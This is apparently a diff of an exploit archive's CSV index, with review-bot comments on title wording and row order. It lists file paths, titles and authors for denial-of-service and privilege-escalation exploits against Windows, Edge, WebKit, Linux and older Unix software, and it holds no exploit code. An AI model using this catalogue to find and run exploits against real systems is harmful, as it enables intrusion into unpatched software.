19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 
@@ -4578,7 +4582,7 @@ id,file,description,date,author,platform,type,port 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,windows,dos,0 -37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize'",2015-06-23,"Francis Provencher",windows,dos,0 +37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 
@@ -4658,7 +4662,7 @@ id,file,description,date,author,platform,type,port 37861,platforms/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 37862,platforms/windows/dos/37862.txt,"Adobe Flash - Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0 37863,platforms/multiple/dos/37863.txt,"Adobe Flash - scale9Grid Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 -37864,platforms/multiple/dos/37864.txt,"Adobe Flash - Use-After-Free in Drawing Methods 'this'",2015-08-19,"Google Security Research",multiple,dos,0 +37864,platforms/multiple/dos/37864.txt,"Adobe Flash - Drawing Methods 'this' Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0 37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0 
@@ -5194,7 +5198,7 @@ id,file,description,date,author,platform,type,port 40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions",2016-06-29,"Google Security Research",multiple,dos,0 40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 -40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 +40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - TNEF Decoder Integer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0 40037,platforms/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0 
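Review bot: the 40035 rename to "Symantec AntiVirus - TNEF Decoder Integer Overflow" puts the component before the bug class, but the adjacent rows from the same 2016-06-29 Google Security Research batch keep the old word order: 40034 "Heap Overflow Modifying MIME Messages" and 40036 "Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink". If component-first is the convention (40032's "'dec2lha Library' Remote Stack Buffer Overflow" already follows it), the same hunk should rewrite 40034 and 40036 too instead of leaving the batch half converted.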
@@ -5525,8 +5529,8 @@ id,file,description,date,author,platform,type,port 42048,platforms/linux/dos/42048.c,"Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer",2017-05-22,"Google Security Research",linux,dos,0 42049,platforms/multiple/dos/42049.txt,"Apple iOS/macOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver",2017-05-23,"Google Security Research",multiple,dos,0 42050,platforms/multiple/dos/42050.txt,"Apple iOS/macOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]",2017-05-23,"Google Security Research",multiple,dos,0 -42051,platforms/multiple/dos/42051.txt,"Apple iOS/macOS - NSKeyedArchiver Heap Corruption Due to Rounding Error in 'TIKeyboardLayout initWithCoder:'",2017-05-23,"Google Security Research",multiple,dos,0 -42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin'",2017-05-23,"Google Security Research",multiple,dos,0 +42051,platforms/multiple/dos/42051.txt,"Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error",2017-05-23,"Google Security Research",multiple,dos,0 +42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking",2017-05-23,"Google Security Research",multiple,dos,0 42054,platforms/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos,0 42055,platforms/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos,0 42056,platforms/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices 
Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0 @@ -5659,8 +5663,8 @@ id,file,description,date,author,platform,type,port 42467,platforms/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",windows,dos,0 42468,platforms/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0 42469,platforms/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",windows,dos,0 -42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'",2017-08-17,"Google Security Research",windows,dos,0 -42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'",2017-08-17,"Google Security Research",windows,dos,0 +42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)",2017-08-17,"Google Security Research",windows,dos,0 +42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)",2017-08-17,"Google Security Research",windows,dos,0 42472,platforms/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",windows,dos,0 42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0 42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0 
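Review bot: in the @@ -5659,8 +5663,8 @@ hunk, 42469 and the rewritten 42470 now share the prefix "Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'", which groups them well, but only 42470 and 42471 receive the "(Denial of Service)" suffix although 42469, 42472, 42473 and 42474 are the same type (dos), same date and same reporter. Either apply the suffix to the whole batch or drop it from these two; the type column already records dos, so the suffix only helps if it is used uniformly.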
@@ -5684,8 +5688,8 @@ id,file,description,date,author,platform,type,port 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 -42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath'",2017-09-18,"Google Security Research",windows,dos,0 -42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow'",2017-09-18,"Google Security Research",windows,dos,0 +42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos,0 +42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - 
Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 @@ -5693,7 +5697,7 @@ id,file,description,date,author,platform,type,port 42762,platforms/linux/dos/42762.txt,"Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0 42763,platforms/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos,0 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0 -42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0 +42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service)",2017-09-21,"Google Security Research",windows,dos,0 42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0 
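Review bot: the 42765 rewrite in the @@ -5693,7 +5697,7 @@ hunk fixes the casing ("Does Not Handle") and turns 'eval' into 'eval()', but leaves 42763 in the same hunk as "Microsoft Edge - Chakra Incorrectly Parses Object Patterns", the only row in this region that splits "Edge - Chakra" at the hyphen instead of using the "Microsoft Edge Chakra - ..." prefix every neighbour uses. Normalise 42763 to "Microsoft Edge Chakra - Incorrectly Parses Object Patterns" while this block is being edited.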
@@ -5715,12 +5719,12 @@ id,file,description,date,author,platform,type,port 42995,platforms/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",windows,dos,0 42997,platforms/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",windows,dos,0 42998,platforms/windows/dos/42998.js,"Microsoft Edge Chakra JIT - Incorrect GenerateBailOut Calling Patterns",2017-10-17,"Google Security Research",windows,dos,0 -42999,platforms/windows/dos/42999.js,"Microsoft Edge Chakra - Accesses to Uninitialized Pointers in 'StackScriptFunction::BoxState::Box'",2017-10-17,"Google Security Research",windows,dos,0 +42999,platforms/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",windows,dos,0 43000,platforms/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",windows,dos,0 43001,platforms/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos,0 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 43107,platforms/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",ios,dos,0 -43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 +43014,platforms/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - 
Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0 
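Review bot: the @@ -5715,12 +5719,12 @@ hunk touches 42999 and 43014 but keeps `43107,platforms/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,...` wedged between 43010 and 43014, out of id order and dated later than the 43058 row that follows it. files.csv is sorted by id within each type, so move 43107 below 43058 (and ahead of the 43152 row that opens the next hunk) while this block is open.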
@@ -5737,7 +5741,19 @@ id,file,description,date,author,platform,type,port 43152,platforms/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",windows,dos,0 43154,platforms/windows/dos/43154.js,"Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion",2017-11-16,"Google Security Research",windows,dos,0 43161,platforms/ios/dos/43161.py,"iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service",2017-11-20,"Russian Otter",ios,dos,0 +43164,platforms/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,hardware,dos,0 43165,platforms/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",windows,dos,0 +43166,platforms/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43167,platforms/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43168,platforms/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43169,platforms/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43170,platforms/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 +43171,platforms/multiple/dos/43171.js,"WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 +43172,platforms/multiple/dos/43172.js,"WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 
+43173,platforms/multiple/dos/43173.html,"WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43174,platforms/multiple/dos/43174.html,"WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43175,platforms/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43176,platforms/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 
@@ -5755,9 +5771,9 @@ id,file,description,date,author,platform,type,port 91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 104,platforms/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Privilege Escalation",2003-09-21,c0wboy,linux,local,0 -106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local",2003-09-27,"Juan Escriba",linux,local,0 +106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",linux,local,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Buffer Overflow",2003-10-27,osker178,solaris,local,0 -118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local",2003-11-07,"Scott Bartram",bsd,local,0 +118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",bsd,local,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 122,platforms/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,windows,local,0 125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0 
@@ -5767,7 +5783,7 @@ id,file,description,date,author,platform,type,port 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 -144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Local",2004-01-15,l0om,linux,local,0 +144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 154,platforms/linux/local/154.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 
@@ -5783,13 +5799,13 @@ id,file,description,date,author,platform,type,port 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 -202,platforms/bsd/local/202.c,"BSDi 3.0/4.0 - rcvtty[mh] Local",2000-11-21,vade79,bsd,local,0 +202,platforms/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Privilege Escalation",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Privilege Escalation",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0 -210,platforms/solaris/local/210.c,"Solaris locale - Format Strings 'noexec stack'",2000-11-30,warning3,solaris,local,0 +210,platforms/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,solaris,local,0 215,platforms/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP - File Creation/Overwriting Symlinks",2000-12-04,t--zen,linux,local,0 
@@ -5805,26 +5821,26 @@ id,file,description,date,author,platform,type,port 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,solaris,local,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Overflow",2001-01-15,teleh0r,linux,local,0 -255,platforms/linux/local/255.pl,"RedHat 6.1 man - 'egid 15' Local",2001-01-19,teleh0r,linux,local,0 +255,platforms/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 -260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local",2001-01-26,"Michel Kaempf",linux,local,0 +260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Overflow",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local,0 -265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local",2001-05-07,LSD-PLaNET,irix,local,0 -270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local",2001-05-08,LSD-PLaNET,irix,local,0 +265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,irix,local,0 +270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Privilege Escalation",2001-05-08,LSD-PLaNET,irix,local,0 
271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 -285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local",2001-03-03,kengz,linux,local,0 +285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Privilege Escalation",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0 -290,platforms/linux/local/290.tcsh,"GLIBC 2.1.3 - LD_PRELOAD Local",2001-03-04,Shadow,linux,local,0 +290,platforms/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Privilege Escalation",2001-03-04,Shadow,linux,local,0 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 -317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local",1996-01-01,"Jared Mauch",linux,local,0 +317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege 
Escalation",1996-08-13,bloodmask,multiple,local,0 @@ -5832,7 +5848,7 @@ id,file,description,date,author,platform,type,port 325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink",1997-05-03,"Chris Sheldon",solaris,local,0 -331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm",1997-05-14,"Ming Zhang",linux,local,0 +331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,irix,local,0 
